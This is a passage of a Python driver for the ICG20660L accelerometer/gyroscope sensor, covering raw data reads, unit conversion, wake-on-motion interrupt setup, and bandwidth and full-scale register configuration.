false     |    0~255    |\n        @n ----------------------------------------------------------------------------|\n        @n |             |  eODR_125Hz |     true     |      7      |\n        @n |             |-----------------------------------------------|\n        @n |bd of supporting low power |  eODR_250Hz |     true     |      3      |\n        @n |consumption mode           |-----------------------------------------------|\n        @n |                           |  eODR_500Hz |     true     |      1      |\n        @n |---------------------------------------------------------------------------|\n        '''\n        div &= 0xff\n        self._write_bytes(self.REG_ICG20660L_SMPLRT_DIV, [div])\n\n    def get_raw_data(self, length = 0):\n        '''!\n        @brief Get 14 bytes raw data, including accel, gyro and temperature.\n        @param length: The length of the returned list.\n        @return data: list type, buffer for storing 14 bytes of raw data\n        @n The first byte of data : Acceleration X-axis high byte data.\n        @n The second byte of data: Acceleration X-axis low byte data.\n        @n The third byte of data : Acceleration Y-axis high byte data.\n        @n The 4th byte of data : Acceleration Y-axis low byte data.\n        @n The 5th byte of data : Acceleration Z-axis high byte data.\n        @n The 6th byte of data : Acceleration Z-axis low byte data.\n        @n The 7th byte of data : Temperature 
high byte data.\n        @n The 8th byte of data : Temperature low byte data.\n        @n The 9th byte of data : Gyro X-axis high byte data.\n        @n The 10th byte of data : Gyro X-axis low byte data.\n        @n The 11th byte of data : Gyro Y-axis high byte data.\n        @n The 12th byte of data : Gyro Y-axis low byte data.\n        @n The 13th byte of data : Gyro Z-axis high byte data.\n        @n The 14th byte of data : Gyro Z-axis low byte data.\n        @note You can use RAW_DATA_LENGTH to create a data array, and you can use \n        @n RAW_DATA_AX_H_INDEX, RAW_DATA_AX_L_INDEX, RAW_DATA_AY_H_INDEX, RAW_DATA_AY_L_INDEX, RAW_DATA_AZ_H_INDEX, RAW_DATA_AZ_L_INDEX,\n        @n RAW_DATA_T_H_INDEX, RAW_DATA_T_L_INDEX,RAW_DATA_GX_H_INDEX, RAW_DATA_GX_L_INDEX, \n        @n RAW_DATA_GY_H_INDEX, RAW_DATA_GY_L_INDEX, RAW_DATA_GZ_H_INDEX, RAW_DATA_GZ_L_INDEX or 0~13 to index data array.\n        '''\n        self._raw_data = [0]*self.RAW_DATA_LENGTH\n        if self._data_mode == self.eFIFO_MODE:\n            self._read_data_from_fifo()\n        else:\n            self._read_data_from_reg()\n        self._update = 0x7F\n        return self._raw_data[0:length]\n\n    def get_sensor_data(self):\n        '''!\n        @brief Get Sensor's accel, gyro and temperature data.\n        @return Dictionary format: {'accel':{'x':0, 'y':0, 'z':0}, 'gyro':{'x':0, 'y':0, 'z':0}, 'temp':0.0}\n        '''\n        self.get_raw_data()\n        sensor = {'accel':{'x':0.0, 'y':0.0, 'z':0.0}, 'gyro':{'x':0.0, 'y':0.0, 'z':0.0}, 'temp':0.0}\n        sensor['accel']['x'] = self._cal_value(self._raw_data[self.RAW_DATA_AX_H_INDEX], self._raw_data[self.RAW_DATA_AX_L_INDEX])/self._accel_scale\n        sensor['accel']['y'] = self._cal_value(self._raw_data[self.RAW_DATA_AY_H_INDEX], self._raw_data[self.RAW_DATA_AY_L_INDEX])/self._accel_scale\n        sensor['accel']['z'] = self._cal_value(self._raw_data[self.RAW_DATA_AZ_H_INDEX], self._raw_data[self.RAW_DATA_AZ_L_INDEX])/self._accel_scale\n        \n        sensor['gyro']['x'] = self._cal_value(self._raw_data[self.RAW_DATA_GX_H_INDEX], self._raw_data[self.RAW_DATA_GX_L_INDEX])/self._gyro_scale\n        sensor['gyro']['y'] = self._cal_value(self._raw_data[self.RAW_DATA_GY_H_INDEX], self._raw_data[self.RAW_DATA_GY_L_INDEX])/self._gyro_scale\n        sensor['gyro']['z'] = self._cal_value(self._raw_data[self.RAW_DATA_GZ_H_INDEX], self._raw_data[self.RAW_DATA_GZ_L_INDEX])/self._gyro_scale\n        \n        sensor['temp'] = self._cal_value(self._raw_data[self.RAW_DATA_T_H_INDEX], self._raw_data[self.RAW_DATA_T_L_INDEX])/326.8 + 25\n        self._update = 0\n        return sensor\n\n    def get_accel_x(self):\n        '''!\n        @brief Get X axis acceleration, unit g.\n        @return X axis acceleration.\n        '''\n        if self._update & 0x01 == 0:\n            self.get_raw_data()\n        self._update &= 0xFE\n        return self._cal_value(self._raw_data[self.RAW_DATA_AX_H_INDEX], self._raw_data[self.RAW_DATA_AX_L_INDEX])/self._accel_scale\n\n    def get_accel_y(self):\n        '''!\n        @brief Get Y axis acceleration, unit g.\n        @return Y axis acceleration.\n        '''\n        if self._update & 0x02 == 0:\n            self.get_raw_data()\n        self._update &= 0xFD\n        return self._cal_value(self._raw_data[self.RAW_DATA_AY_H_INDEX], self._raw_data[self.RAW_DATA_AY_L_INDEX])/self._accel_scale\n\n    def get_accel_z(self):\n        '''!\n        @brief Get Z axis acceleration, unit g.\n        @return Z axis acceleration.\n        '''\n        if self._update & 0x04 == 0:\n            self.get_raw_data()\n        self._update &= 0xFB\n        return self._cal_value(self._raw_data[self.RAW_DATA_AZ_H_INDEX], self._raw_data[self.RAW_DATA_AZ_L_INDEX])/self._accel_scale\n    \n    def get_temperature_c(self):\n        '''!\n        @brief Get temperature data, unit: ℃.\n        @return Temperature data.\n        '''\n        if self._update & 0x08 == 0:\n            self.get_raw_data()\n        self._update &= 0xF7\n        return 
self._cal_value(self._raw_data[self.RAW_DATA_T_H_INDEX], self._raw_data[self.RAW_DATA_T_L_INDEX])/326.8 + 25\n \n def get_gyro_x(self):\n '''!\n @brief Get X-axis gyroscope speed, unit dps.\n @return X-axis gyroscope speed.\n '''\n if self._update & 0x10 == 0:\n self.get_raw_data()\n self._update &= 0xEF\n\n return self._cal_value(self._raw_data[self.RAW_DATA_GX_H_INDEX], self._raw_data[self.RAW_DATA_GX_L_INDEX])/self._gyro_scale\n\n def get_gyro_y(self):\n '''!\n @brief Get Y-axis gyroscope speed, unit dps.\n @return Y-axis gyroscope speed.\n '''\n if self._update & 0x20 == 0:\n self.get_raw_data()\n self._update &= 0xDF\n return self._cal_value(self._raw_data[self.RAW_DATA_GY_H_INDEX], self._raw_data[self.RAW_DATA_GY_L_INDEX])/self._gyro_scale\n\n def get_gyro_z(self):\n '''!\n @brief Get z-axis gyroscope speed, unit dps.\n @return z-axis gyroscope speed.\n '''\n if self._update & 0x40 == 0:\n self.get_raw_data()\n self._update &= 0xBF\n return self._cal_value(self._raw_data[self.RAW_DATA_GZ_H_INDEX], self._raw_data[self.RAW_DATA_GZ_L_INDEX])/self._gyro_scale\n\n def set_int_pin_motion_trigger_polarity(self, polarity):\n '''!\n @brief Set the level polarity of the INT pin when the accelerometer sensor is triggered to wake up the motion interrupt.\n @param polarity: the level signal of the sensor INT pin when the wake-up motion is triggered\n @n GPIO.HIGH: The initial signal of the pin is LOW. When an accelerometer wake-up motion occurs, the level signal of the INT pin will change to HIGH. \n @n Then the readINTStatus function needs to be called to clear the signal and restore the initial signal.\n @n GPIO.LOW: The initial signal of the pin is HIGH. When an accelerometer wake-up motion occurs, the level signal of the INT pin will change to LOW.\n @n Then the readINTStatus function needs to be called to clear the signal and restore the initial signal.\n @note After triggering the accelerometer wake-up motion, if the read_int_status function is not called to clear the sign, \n @n the INT pin will always maintain the level polarity when the motion is triggered.\n '''\n acl_rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, 1)\n acl_rslt = self._update_reg_bit_value(acl_rslt[0], self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 2)\n self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, [acl_rslt])\n self._level = polarity\n pin_rslt = self._read_bytes(self.REG_ICG20660L_INT_PIN_CFG, 1)\n \n if polarity == GPIO.HIGH:\n pin_rslt = self._update_reg_bit_value(pin_rslt[0], self.BIT_INT_LEVEL, self.OFFSET_INT_LEVEL, 0)\n else:\n pin_rslt = self._update_reg_bit_value(pin_rslt[0], self.BIT_INT_LEVEL, self.OFFSET_INT_LEVEL, 1)\n pin_rslt = self._update_reg_bit_value(pin_rslt, self.BIT_INT_OPEN, self.OFFSET_INT_OPEN, 0)\n pin_rslt = self._update_reg_bit_value(pin_rslt, self.BIT_LATCH_INT_EN, self.OFFSET_LATCH_INT_EN, 1)\n self._write_bytes(self.REG_ICG20660L_INT_PIN_CFG, [pin_rslt])\n \n irq_rslt = self._read_bytes(self.REG_ICG20660L_INT_ENABLE, 1)\n irq_rslt = self._update_reg_bit_value(irq_rslt[0], self.BIT_WOM_EN, self.OFFSET_WOM_EN, 7)\n irq_rslt = self._update_reg_bit_value(irq_rslt, self.BIT_DATA_RDY_INT_EN, self.OFFSET_DATA_RDY_INT_EN, 0)\n self._write_bytes(self.REG_ICG20660L_INT_ENABLE, [irq_rslt])\n time.sleep(1)\n \n itel_rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_INTEL_CTRL, 1)\n itel_rslt = self._update_reg_bit_value(itel_rslt[0], self.BIT_ACCEL_INTEL_EN, self.OFFSET_ACCEL_INTEL_EN, 1)\n itel_rslt = self._update_reg_bit_value(itel_rslt, self.BIT_WOM_TH_MODE, self.OFFSET_WOM_TH_MODE, 
1)\n        itel_rslt = self._update_reg_bit_value(itel_rslt, self.BIT_ACCEL_INTEL_MODE, self.OFFSET_ACCEL_INTEL_MODE, 1)\n        self._write_bytes(self.REG_ICG20660L_ACCEL_INTEL_CTRL, [itel_rslt])\n\n    def set_wake_on_motion_thread_for_accel(self, level):\n        '''!\n        @brief Set the threshold value for the Wake on Motion Interrupt for accelerometer. \n        @param level: WoM thresholds are expressed in fixed “mg” independent of the selected Range [0g : 1g]; Resolution 1g/256=~3.9mg\n        @n level = 0~255\n        @return Actual WoM threshold, unit : g re_value = (level * 3.9)/1000 g\n        '''\n        g = (level * 3.9)/1000.0\n        self._write_bytes(self.REG_ICG20660L_ACCEL_WOM_THR, [level])\n        return g\n\n    def get_int_pin_motion_trigger_polarity(self):\n        '''!\n        @brief Get the polarity of the INT pin of sensor when the sensor INT pin triggers an interrupt.\n        @return The level signal when the INT pin triggers an interrupt.\n        @n GPIO.HIGH: INT pin level held HIGH LEVEL until interrupt status is cleared.\n        @n GPIO.LOW: INT pin level held LOW LEVEL until interrupt status is cleared.\n        '''\n        return self._level\n    \n    def read_int_status(self):\n        '''!\n        @brief Read interrupt status register, and clear INT pin's interrupt signal. \n        @return Interrupt status register value.\n        @n INT_STATUS register:addr:0x3A,access:rw\n        @n ------------------------------------------------------------------------------------\n        @n | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n        @n ------------------------------------------------------------------------------------\n        @n | WOM_XYZ_INT | FIFO_OFLOW_INT | rsv | DATA_RDY_INT |\n        @n ------------------------------------------------------------------------------------\n        @n DATA_RDY_INT : This bit automatically sets to 1 when a Data Ready interrupt is generated. The bit clears to 0 after the register has been read.\n        @n rsv : reserved\n        @n FIFO_OFLOW_INT: This bit automatically sets to 1 when a FIFO buffer overflow has been generated. The bit clears to 0 after the register has been read.\n        
@n WOM_XYZ_INT : These bits automatically set to a non-zero value when the X-axis, Y-axis or Z-axis of the accelerometer triggers a WOM (wake on motion)\n        @n interrupt. Cleared on read.\n        '''\n        rslt = self._read_bytes(self.REG_ICG20660L_INT_STATUS, 1)\n        return rslt[0]\n    \n    def _cal_value(self, h, l):\n        # Combine the high and low bytes, then apply 16-bit two's complement.\n        value = ((h & 0xFF) << 8) | (l & 0xFF)\n        if value & 0x8000:\n            value -= 0x10000\n        return value\n\n    def _update_reg_bit_value(self, reg_value, bit, offset, value):\n        #print(\"reg_value = %#x, bit = %d, offset = %#x, value = %#x\"%(reg_value,bit,offset, value))\n        reg_value &= ((~(offset << bit)) & 0xFF)\n        #print(\"reg_value1 = %#x\"%reg_value)\n        reg_value |= (value << bit)\n        #print(\"reg_value2 = %#x\"%reg_value)\n        return reg_value & 0xFF\n\n    def _get_reg_bit_value(self, reg_value, bit, offset):\n        #print(\"reg_value = %#x, bit = %d, offset = %#x\"%(reg_value,bit,offset))\n        reg_value >>= bit\n        #print(\"reg_value1 = %#x\"%reg_value)\n        reg_value &= offset\n        #print(\"reg_value2 = %#x\"%reg_value)\n        return reg_value & 0xFF\n    \n    def _select_clock_source(self, clk):\n        rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n        if len(rslt) == 1:\n            rslt = self._update_reg_bit_value(rslt[0], self.BIT_CLKSEL, self.OFFSET_CLKSEL, clk)\n        else:\n            return None\n        self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n        time.sleep(1)\n    \n    def _enable_fifo(self, temp, gx, gy, gz, accel):\n        rslt_fifo_en = self._read_bytes(self.REG_ICG20660L_FIFO_EN, 1)\n        rslt_usr = self._read_bytes(self.REG_ICG20660L_USER_CTRL, 1)\n        rslt_cfg = self._read_bytes(self.REG_ICG20660L_CONFIG, 1)\n        \n        if temp or gx or gy or gz or accel:\n            rslt_usr = self._update_reg_bit_value(rslt_usr[0], self.BIT_FIFO_EN, self.OFFSET_FIFO_EN, 1)\n            rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_FIFO_RST, self.OFFSET_FIFO_RST, 1)\n            rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_SIG_COND_RST, self.OFFSET_SIG_COND_RST, 1)\n            rslt_cfg = self._update_reg_bit_value(rslt_cfg[0], self.BIT_FIFO_MODE, self.OFFSET_FIFO_MODE, 0)\n        else:\n            rslt_usr = self._update_reg_bit_value(rslt_usr[0], self.BIT_FIFO_EN, self.OFFSET_FIFO_EN, 0)\n            rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_FIFO_RST, self.OFFSET_FIFO_RST, 1)\n            rslt_usr = self._update_reg_bit_value(rslt_usr, self.BIT_SIG_COND_RST, self.OFFSET_SIG_COND_RST, 1)\n            rslt_cfg = self._update_reg_bit_value(rslt_cfg[0], self.BIT_FIFO_MODE, self.OFFSET_FIFO_MODE, 0)\n        rslt_fifo_en = self._update_reg_bit_value(rslt_fifo_en[0], self.BIT_ACCEL_FIFO_EN, self.OFFSET_ACCEL_FIFO_EN, accel)\n        rslt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_ZG_FIFO_EN, self.OFFSET_ZG_FIFO_EN, gz)\n        rslt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_YG_FIFO_EN, self.OFFSET_YG_FIFO_EN, gy)\n        rslt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_XG_FIFO_EN, self.OFFSET_XG_FIFO_EN, gx)\n        rslt_fifo_en = self._update_reg_bit_value(rslt_fifo_en, self.BIT_TEMP_FIFO_EN, self.OFFSET_TEMP_FIFO_EN, temp)\n        # Apply the updated USER_CTRL, CONFIG and FIFO_EN values.\n        self._write_bytes(self.REG_ICG20660L_USER_CTRL, [rslt_usr])\n        self._write_bytes(self.REG_ICG20660L_CONFIG, [rslt_cfg])\n        self._write_bytes(self.REG_ICG20660L_FIFO_EN, [rslt_fifo_en])\n        rslt_fifo_en = self._read_bytes(self.REG_ICG20660L_FIFO_EN, 1)\n        temp = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_TEMP_FIFO_EN, self.OFFSET_TEMP_FIFO_EN)\n        gx = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_XG_FIFO_EN, self.OFFSET_XG_FIFO_EN)\n        gy = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_YG_FIFO_EN, self.OFFSET_YG_FIFO_EN)\n        gz = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_ZG_FIFO_EN, self.OFFSET_ZG_FIFO_EN)\n        
accel = self._get_reg_bit_value(rslt_fifo_en[0], self.BIT_ACCEL_FIFO_EN, self.OFFSET_ACCEL_FIFO_EN)\n        self._fifo_frame_size = accel*6 + (temp+gx+gy+gz)*2\n    \n    def _set_full_scale_for_gyro(self, scale):\n        scale &= 0x03\n        rslt = self._read_bytes(self.REG_ICG20660L_GYRO_CONFIG, 1)\n        rslt = self._update_reg_bit_value(rslt[0], self.BIT_XG_ST, self.OFFSET_XG_ST, 0)\n        rslt = self._update_reg_bit_value(rslt, self.BIT_YG_ST, self.OFFSET_YG_ST, 0)\n        rslt = self._update_reg_bit_value(rslt, self.BIT_ZG_ST, self.OFFSET_ZG_ST, 0)\n        rslt = self._update_reg_bit_value(rslt, self.BIT_FS_SEL, self.OFFSET_FS_SEL, scale)\n        self._write_bytes(self.REG_ICG20660L_GYRO_CONFIG, [rslt])\n        if scale == self.eFSR_G_125DPS:\n            self._gyro_range = self.GYRO_FULL_SCALE_125DPS\n        elif scale == self.eFSR_G_250DPS:\n            self._gyro_range = self.GYRO_FULL_SCALE_250DPS\n        elif scale == self.eFSR_G_500DPS:\n            self._gyro_range = self.GYRO_FULL_SCALE_500DPS\n        self._gyro_scale = self.ADC_MAX_RANGE/self._gyro_range\n\n    def _set_bandwidth_for_gyro(self, bd):\n        rslt_gyro = self._read_bytes(self.REG_ICG20660L_GYRO_CONFIG, 1)\n        rslt = self._read_bytes(self.REG_ICG20660L_CONFIG, 1)\n        rslt_gyro = self._update_reg_bit_value(rslt_gyro[0], self.BIT_FCHOICE_B, self.OFFSET_FCHOICE_B, 0)\n        rslt = self._update_reg_bit_value(rslt[0], self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 0)\n\n        if bd == self.eGYRO_DLPF_8173_32KHZ:\n            rslt_gyro = self._update_reg_bit_value(rslt_gyro, self.BIT_FCHOICE_B, self.OFFSET_FCHOICE_B, 1)\n\n        elif bd == self.eGYRO_DLPF_3281_32KHZ:\n            rslt_gyro = self._update_reg_bit_value(rslt_gyro, self.BIT_FCHOICE_B, self.OFFSET_FCHOICE_B, 2)\n\n        elif bd == self.eGYRO_DLPF_250_8KHZ:\n            rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 0)\n\n        elif bd == self.eGYRO_DLPF_176_1KHZ:\n            rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 1)\n\n        elif bd == self.eGYRO_DLPF_92_1KHZ:\n            rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 2)\n\n        elif bd == self.eGYRO_DLPF_3281_8KHZ:\n            rslt = self._update_reg_bit_value(rslt, self.BIT_DLPF_CFG, self.OFFSET_DLPF_CFG, 7)\n\n        #print(type(rslt))\n        #print(rslt)\n        #print(type(rslt_gyro))\n        #print(rslt_gyro)\n        #print(\"rslt_gyro=%#x,rslt=%#x\"%(rslt_gyro, rslt))\n        self._write_bytes(self.REG_ICG20660L_GYRO_CONFIG, [rslt_gyro])\n        self._write_bytes(self.REG_ICG20660L_CONFIG, [rslt])\n        rslt_gyro = self._read_bytes(self.REG_ICG20660L_GYRO_CONFIG, 1)\n        rslt = self._read_bytes(self.REG_ICG20660L_CONFIG, 1)\n        #print(\"rslt_gyro=%#x,rslt=%#x\"%(rslt_gyro[0], rslt[0]))\n\n    def _set_full_scale_for_accel(self, scale):\n        scale &= 0x03\n        rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG, 1)\n        rslt = self._update_reg_bit_value(rslt[0], self.BIT_XA_ST, self.OFFSET_XA_ST, 0)\n        rslt = self._update_reg_bit_value(rslt, self.BIT_YA_ST, self.OFFSET_YA_ST, 0)\n        rslt = self._update_reg_bit_value(rslt, self.BIT_ZA_ST, self.OFFSET_ZA_ST, 0)\n        rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FS_SEL, self.OFFSET_ACCEL_FS_SEL, scale)\n        self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG, [rslt])\n        if scale == self.eFSR_A_2G:\n            self._accel_range = self.ACCEL_FULL_SCALE_2G\n        elif scale == self.eFSR_A_4G:\n            self._accel_range = self.ACCEL_FULL_SCALE_4G\n        elif scale == self.eFSR_A_8G:\n            self._accel_range = self.ACCEL_FULL_SCALE_8G\n        elif scale == self.eFSR_A_16G:\n            self._accel_range = self.ACCEL_FULL_SCALE_16G\n        self._accel_scale = self.ADC_MAX_RANGE/self._accel_range\n\n    def _set_bandwidth_for_accel(self, bd):\n        rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n        
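# The branches below pick the accelerometer DLPF per power mode: low-power\n        # mode sets the CYCLE bit and configures the DEC2 averaging decimator,\n        # while six-axis low-noise mode clears CYCLE and GYRO_STANDBY first.\n        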
if self._mode == self.eACCEL_LOW_POWER_MODE:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_CYCLE, self.OFFSET_CYCLE, 1)\n self._set_bandwidth_for_accel_in_low_power_mode(bd)\n elif self._mode == self.eSIX_AXIS_LOW_NOISE_MODE:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_CYCLE, self.OFFSET_CYCLE, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_GYRO_STANDBY, self.OFFSET_GYRO_STANDBY, 0)\n self._set_bandwidth_for_accel_in_others_mode(bd)\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n\n def _set_bandwidth_for_accel_in_others_mode(self, bd):\n rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, 1)\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_FIFO_SIZE, self.OFFSET_FIFO_SIZE, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 0)\n if bd == self.eACCEL_DLPF_5_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 6)\n elif bd == self.eACCEL_DLPF_10_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 5)\n elif bd == self.eACCEL_DLPF_21_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 4)\n elif bd == self.eACCEL_DLPF_44_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 3)\n elif bd == self.eACCEL_DLPF_99_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 2)\n elif bd == self.eACCEL_DLPF_218_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 1)\n elif bd == self.eACCEL_DLPF_420_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n elif bd == self.eACCEL_DLPF_1046_4KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 1)\n self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, [rslt])\n\n def _set_bandwidth_for_accel_in_low_power_mode(self, bd):\n rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, 1)\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_FIFO_SIZE, self.OFFSET_FIFO_SIZE, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 0)\n if bd == self.eACCEL_DLPF_218_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 1)\n elif bd == self.eACCEL_DLPF_420_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 
0)\n elif bd == self.eACCEL_DLPF_55_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 3)\n elif bd == self.eACCEL_DLPF_110_1KHZ:\n rslt = self._update_reg_bit_value(rslt, self.BIT_ACCEL_FCHOICE_B, self.OFFSET_ACCEL_FCHOICE_B, 0)\n rslt = self._update_reg_bit_value(rslt, self.BIT_A_DLPF_CFG, self.OFFSET_A_DLPF_CFG, 7)\n rslt = self._update_reg_bit_value(rslt, self.BIT_DEC2_CFG, self.OFFSET_DEC2_CFG, 2)\n self._write_bytes(self.REG_ICG20660L_ACCEL_CONFIG2, [rslt])\n \n def _read_data_from_fifo(self):\n rslt_fifo = self._read_bytes(self.REG_ICG20660L_FIFO_EN, 1)\n val = self._read_bytes(self.REG_ICG20660L_FIFO_COUNTH, 2)\n val = (((val[0] & 0x1F) << 8)&0xffff) | val[1]\n count = 0\n if val >= self._fifo_frame_size:\n rslt = self._read_bytes(self.REG_ICG20660L_FIFO_R_W, self._fifo_frame_size)\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_TEMP_FIFO_EN, self.OFFSET_TEMP_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_T_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_T_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_XG_FIFO_EN, self.OFFSET_XG_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_GX_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_GX_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_YG_FIFO_EN, self.OFFSET_YG_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_GY_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_GY_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_ZG_FIFO_EN, self.OFFSET_ZG_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_GZ_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_GZ_L_INDEX] = rslt[count+1]\n count += 2\n if self._get_reg_bit_value(rslt_fifo[0], self.BIT_ACCEL_FIFO_EN, self.OFFSET_ACCEL_FIFO_EN) and count < self._fifo_frame_size:\n self._raw_data[self.RAW_DATA_AX_H_INDEX] = rslt[count]\n self._raw_data[self.RAW_DATA_AX_L_INDEX] = rslt[count+1]\n self._raw_data[self.RAW_DATA_AY_H_INDEX] = rslt[count+2]\n self._raw_data[self.RAW_DATA_AY_L_INDEX] = rslt[count+3]\n self._raw_data[self.RAW_DATA_AZ_H_INDEX] = rslt[count+4]\n self._raw_data[self.RAW_DATA_AZ_L_INDEX] = rslt[count+5]\n count += 6\n \n def _read_data_from_reg(self):\n rslt = self._read_bytes(self.REG_ICG20660L_ACCEL_XOUT_H, self.RAW_DATA_LENGTH)\n #print(rslt)\n if len(rslt) == self.RAW_DATA_LENGTH:\n self._raw_data[self.RAW_DATA_AX_H_INDEX] = rslt[0]\n self._raw_data[self.RAW_DATA_AX_L_INDEX] = rslt[1]\n self._raw_data[self.RAW_DATA_AY_H_INDEX] = rslt[2]\n self._raw_data[self.RAW_DATA_AY_L_INDEX] = rslt[3]\n self._raw_data[self.RAW_DATA_AZ_H_INDEX] = rslt[4]\n self._raw_data[self.RAW_DATA_AZ_L_INDEX] = rslt[5]\n self._raw_data[self.RAW_DATA_T_H_INDEX] = rslt[6]\n self._raw_data[self.RAW_DATA_T_L_INDEX] = rslt[7]\n self._raw_data[self.RAW_DATA_GX_H_INDEX] = rslt[8]\n self._raw_data[self.RAW_DATA_GX_L_INDEX] = rslt[9]\n self._raw_data[self.RAW_DATA_GY_H_INDEX] = rslt[10]\n self._raw_data[self.RAW_DATA_GY_L_INDEX] = rslt[11]\n self._raw_data[self.RAW_DATA_GZ_H_INDEX] = rslt[12]\n self._raw_data[self.RAW_DATA_GZ_L_INDEX] = rslt[13]\n \n def _write_bytes(self, reg, buf):\n pass\n\n def _read_bytes(self, reg, length):\n pass\n\nclass 
